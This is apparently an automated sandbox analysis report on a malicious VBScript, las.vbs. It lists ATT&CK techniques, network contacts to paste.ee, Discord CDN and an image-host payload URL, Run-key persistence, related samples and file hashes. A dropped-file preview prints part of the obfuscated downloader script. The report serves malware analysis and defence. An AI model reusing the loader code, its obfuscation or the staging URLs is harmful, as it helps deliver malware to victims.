      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information231
      Scripting
      Valid Accounts11
      Command and Scripting Interpreter
      231
      Scripting
      111
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Web Service
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      11
      Registry Run Keys / Startup Folder
      11
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts3
      PowerShell
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      111
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets1
      File and Directory Discovery
      SSHKeylogging14
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials12
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448040 Sample: las.vbs Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 31 paste.ee 2->31 33 uploaddeimagens.com.br 2->33 35 cdn.discordapp.com 2->35 47 Multi AV Scanner detection for domain / URL 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 55 9 other signatures 2->55 10 wscript.exe 14 2->10         started        14 wscript.exe 2->14         started        16 wscript.exe 2->16         started        signatures3 53 Connects to a pastebin service (likely for C&C) 31->53 process4 dnsIp5 41 paste.ee 188.114.96.3, 443, 49730 CLOUDFLARENETUS European Union 10->41 61 System process connects to network (likely due to code injection or exploit) 10->61 63 VBScript performs obfuscated calls to suspicious functions 10->63 65 Suspicious powershell command line found 10->65 69 4 other signatures 10->69 18 powershell.exe 7 10->18         started        67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->67 signatures6 process7 signatures8 43 Suspicious powershell command line found 18->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 18->45 21 powershell.exe 15 17 18->21         started        25 conhost.exe 18->25         started        process9 dnsIp10 37 uploaddeimagens.com.br 188.114.97.3, 443, 49731, 49732 CLOUDFLARENETUS European Union 21->37 39 cdn.discordapp.com 162.159.134.233, 443, 49733 CLOUDFLARENETUS United States 21->39 57 Suspicious powershell command line found 21->57 59 Creates autostart registry keys with suspicious values (likely registry only malware) 21->59 27 powershell.exe 10 21->27         started        signatures11 process12 process13 29 conhost.exe 27->29         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      paste.ee3%VirustotalBrowse
      cdn.discordapp.com0%VirustotalBrowse
      uploaddeimagens.com.br5%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://analytics.paste.ee0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      https://secure.gravatar.com0%URL Reputationsafe
      https://themes.googleusercontent.com0%URL Reputationsafe
      https://paste.ee/d/rXYIP0%Avira URL Cloudsafe
      https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634100%Avira URL Cloudmalware
      https://cdn.discordapp.com/attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff&0%Avira URL Cloudsafe
      https://paste.ee/d/rXYIPY0%Avira URL Cloudsafe
      https://www.google.com0%Avira URL Cloudsafe
      https://paste.ee/d/rXYIPm0%Avira URL Cloudsafe
      https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?171630763413%VirustotalBrowse
      https://www.google.com;0%Avira URL Cloudsafe
      https://www.google.com0%VirustotalBrowse
      https://paste.ee/0%Avira URL Cloudsafe
      https://paste.ee/d/rXYIPl0%Avira URL Cloudsafe
      https://analytics.paste.ee;0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
      https://paste.ee/1%VirustotalBrowse
      https://cdnjs.cloudflare.com0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      paste.ee
      188.114.96.3
      truetrueunknown
      cdn.discordapp.com
      162.159.134.233
      truefalseunknown
      uploaddeimagens.com.br
      188.114.97.3
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      https://paste.ee/d/rXYIPtrue
      • Avira URL Cloud: safe
      unknown
      https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634true
      • 13%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://cdn.discordapp.com/attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff&false
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.comwscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://paste.ee/d/rXYIPYwscript.exe, 00000000.00000003.1725442998.00000225658F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.00000225658FC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://paste.ee/d/rXYIPmwscript.exe, 00000000.00000003.1725442998.00000225658F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.00000225658FC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.google.com;wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://paste.ee/wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmptrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://paste.ee/d/rXYIPlwscript.exe, 00000000.00000002.1730126778.00000225630F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728346909.00000225630CF000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://analytics.paste.ee;wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://analytics.paste.eewscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://aka.ms/pscore68powershell.exe, 00000001.00000002.2241371780.0000024580051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2241371780.000002458006A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1885855670.0000028505942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1885855670.0000028505905000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2241371780.0000024580094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1885855670.0000028505905000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://secure.gravatar.comwscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      188.114.97.3
      uploaddeimagens.com.brEuropean Union
      13335CLOUDFLARENETUStrue
      188.114.96.3
      paste.eeEuropean Union
      13335CLOUDFLARENETUStrue
      162.159.134.233
      cdn.discordapp.comUnited States
      13335CLOUDFLARENETUSfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1448040
      Start date and time:2024-05-27 15:20:05 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 4s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:las.vbs
      Detection:MAL
      Classification:mal100.spre.troj.expl.evad.winVBS@11/10@3/3
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 2
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target powershell.exe, PID 7320 because it is empty
      • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      09:21:03API Interceptor59x Sleep call for process: powershell.exe modified
      14:21:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbs
      14:21:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbs
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.97.3http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
      • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
      http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
      • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
      http://twomancake.comGet hashmaliciousUnknownBrowse
      • twomancake.com/
      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
      • fleur-de-lis.sbs/jhgfd
      Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
      • qr-in.com/YXcuqXy
      LHER000698175.xlsGet hashmaliciousUnknownBrowse
      • qr-in.com/JeYCrvM
      PO 4500025813.xlsGet hashmaliciousUnknownBrowse
      • qr-in.com/RtWEZGi
      SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
      • rocheholding.top/evie3/five/fre.php
      WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
      http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
      • hjkie5.pages.dev/
      188.114.96.3Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
      • www.uqdr.cn/yfa0/
      http://y6ss1.shop/Get hashmaliciousUnknownBrowse
      • y6ss1.shop/l/gaz/videos/gaz-platform-preview.mp4
      http://newclaim-dannx-creat.promodaget.my.id/Get hashmaliciousUnknownBrowse
      • newclaim-dannx-creat.promodaget.my.id/
      http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
      • worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
      • fleur-de-lis.sbs/jhgfd
      KT-L068310.exeGet hashmaliciousFormBookBrowse
      • www.barrettdigitalart.com/i319/
      http://cfg3xe.pages.dev/Get hashmaliciousUnknownBrowse
      • cfg3xe.pages.dev/
      http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
      • amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
      G5N0mtxJLN.exeGet hashmaliciousLokibotBrowse
      • rocheholding.top/evie3/five/fre.php
      Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
      • qr-in.com/YXcuqXy
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      cdn.discordapp.comfile.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
      • 162.159.134.233
      XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
      • 162.159.129.233
      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
      • 162.159.134.233
      https://cdn.discordapp.com/attachments/1240386543366049835/1242103657005318176/Payment_Confirmation_pdf.jar?ex=664c9ead&is=664b4d2d&hm=54d3627edfa4f918ed4c901322596ec71ddb0e6ac7cbb7aadf61cb1f960538ab&Get hashmaliciousUnknownBrowse
      • 162.159.133.233
      upload.vbsGet hashmaliciousUnknownBrowse
      • 162.159.133.233
      update.vbsGet hashmaliciousUnknownBrowse
      • 162.159.134.233
      file.vbsGet hashmaliciousUnknownBrowse
      • 162.159.130.233
      windows.vbsGet hashmaliciousUnknownBrowse
      • 162.159.129.233
      http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
      • 162.159.129.233
      Receipt #761.vbsGet hashmaliciousUnknownBrowse
      • 162.159.130.233
      paste.eeRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      LHER0006981753.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      upload.vbsGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      update.vbsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      file.vbsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      windows.vbsGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      INVOICE.jsGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
      • 188.114.96.3
      Receipt #761.vbsGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      uploaddeimagens.com.brRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      LHER0006981753.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      upload.vbsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      update.vbsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      file.vbsGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      windows.vbsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      INVOICE.jsGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      Receipt #761.vbsGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.13.205
      https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
      • 172.64.151.101
      PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.97.3
      https://web.cinepagal.orgGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.13.205
      hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
      • 104.17.134.249
      RECEIPT-CARGO 00009933CRER3S.exeGet hashmaliciousFormBookBrowse
      • 23.227.38.32
      ctm_260524_pdf.exeGet hashmaliciousFormBookBrowse
      • 104.21.40.171
      RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • 104.21.84.83
      CLOUDFLARENETUSCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.13.205
      https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
      • 172.64.151.101
      PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.97.3
      https://web.cinepagal.orgGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.13.205
      hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
      • 104.17.134.249
      RECEIPT-CARGO 00009933CRER3S.exeGet hashmaliciousFormBookBrowse
      • 23.227.38.32
      ctm_260524_pdf.exeGet hashmaliciousFormBookBrowse
      • 104.21.40.171
      RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • 104.21.84.83
      CLOUDFLARENETUSCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.13.205
      https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
      • 172.64.151.101
      PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.97.3
      https://web.cinepagal.orgGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.13.205
      hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
      • 104.17.134.249
      RECEIPT-CARGO 00009933CRER3S.exeGet hashmaliciousFormBookBrowse
      • 23.227.38.32
      ctm_260524_pdf.exeGet hashmaliciousFormBookBrowse
      • 104.21.40.171
      RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • 104.21.84.83
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3b5074b1b5d032e5620f69f9f700ff0eCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 188.114.97.3
      • 162.159.134.233
      yk4ABozmBY.exeGet hashmaliciousRedLineBrowse
      • 188.114.97.3
      • 162.159.134.233
      Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 188.114.97.3
      • 162.159.134.233
      0000003448.pdf.exeGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      • 162.159.134.233
      Stamp invoice copy.xls.exeGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      • 162.159.134.233
      GestorRemesasCONFIRMIMING.exeGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      • 162.159.134.233
      DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      • 162.159.134.233
      NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.97.3
      • 162.159.134.233
      proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 188.114.97.3
      • 162.159.134.233
      INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
      • 188.114.97.3
      • 162.159.134.233
      37f463bf4616ecd445d4a1937da06e19PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.96.3
      2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 188.114.96.3
      justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 188.114.96.3
      Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 188.114.96.3
      Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
      • 188.114.96.3
      file.exeGet hashmaliciousVidarBrowse
      • 188.114.96.3
      TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.96.3
      Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.96.3
      WQs56g5xeC.exeGet hashmaliciousDCRatBrowse
      • 188.114.96.3
      c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
      • 188.114.96.3
      No context
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 text, with CRLF line terminators
      Category:dropped
      Size (bytes):204074
      Entropy (8bit):5.16860231694857
      Encrypted:false
      SSDEEP:3072:A5yO1lQ014Cet1ns3wflGsZcfwMQA5PGzb8h9:A591lF1UflGsZcfb
      MD5:85CBF9B1A0E3D8FDA14A86535E0692D9
      SHA1:695EAA69C8766E01720DEC322064EE968812F264
      SHA-256:AD4AC01243A9775D26945CF742A06ACB03F34056FEE9576D646FF65617BF94F5
      SHA-512:0EECAD4E71E37B7D387938388D30589D7AE737885EB14F83813F85F9B910AC339BA8E37A9418A050AB842E0298142A5061092A261D1CF1B4C0500E6A64E84C52
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage
      Process:C:\Windows\System32\wscript.exe
      File Type:ASCII text, with very long lines (12366), with CRLF line terminators
      Category:dropped
      Size (bytes):14387
      Entropy (8bit):4.531633639707542
      Encrypted:false
      SSDEEP:384:e7zHsxV4nnhnPMY0u2hd+mKnGCuj3VsjXH+R8Rx2VpPgRkVNyb/zL4X:HVchPMYEhghnG1j3VsjOOCV3gzw
      MD5:01357675E5FDB85A76367CDA6D7FE20A
      SHA1:F6496DFC2412FB896F9CE465D33EB470734D4D1A
      SHA-256:DE3D63732FA95313A97A5B8A2E2BC0835F0D07CB9919FD3CFA40DA3B502F4448
      SHA-512:100E489BE9576ED5B84E0A264BA3557C5C314C669BD3201D82E0A1265C937B22BE248DF10D628E9F146CC4AAC93A75E2AD9F64C011AE4596C2BFDB632D19B07D
      Malicious:false
      Reputation:low
      Preview:.. dim anticipar , fenedina , borzeguim , jurupema , relentar , Cama , relentar1.. fenedina = " ".. borzeguim = "" & jurupema & fenedina & jurupema & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & jurupema & fenedina & jurupema & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & jurupema & fenedina & jurupema & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & jurupema & fenedina & jurupema & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & jurupema & fenedina & jurupema & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & jurupema & fenedina & jurupema & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & jurupema & fenedina
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):9434
      Entropy (8bit):4.928515784730612
      Encrypted:false
      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
      MD5:D3594118838EF8580975DDA877E44DEB
      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
      Malicious:false
      Reputation:moderate, very likely benign file
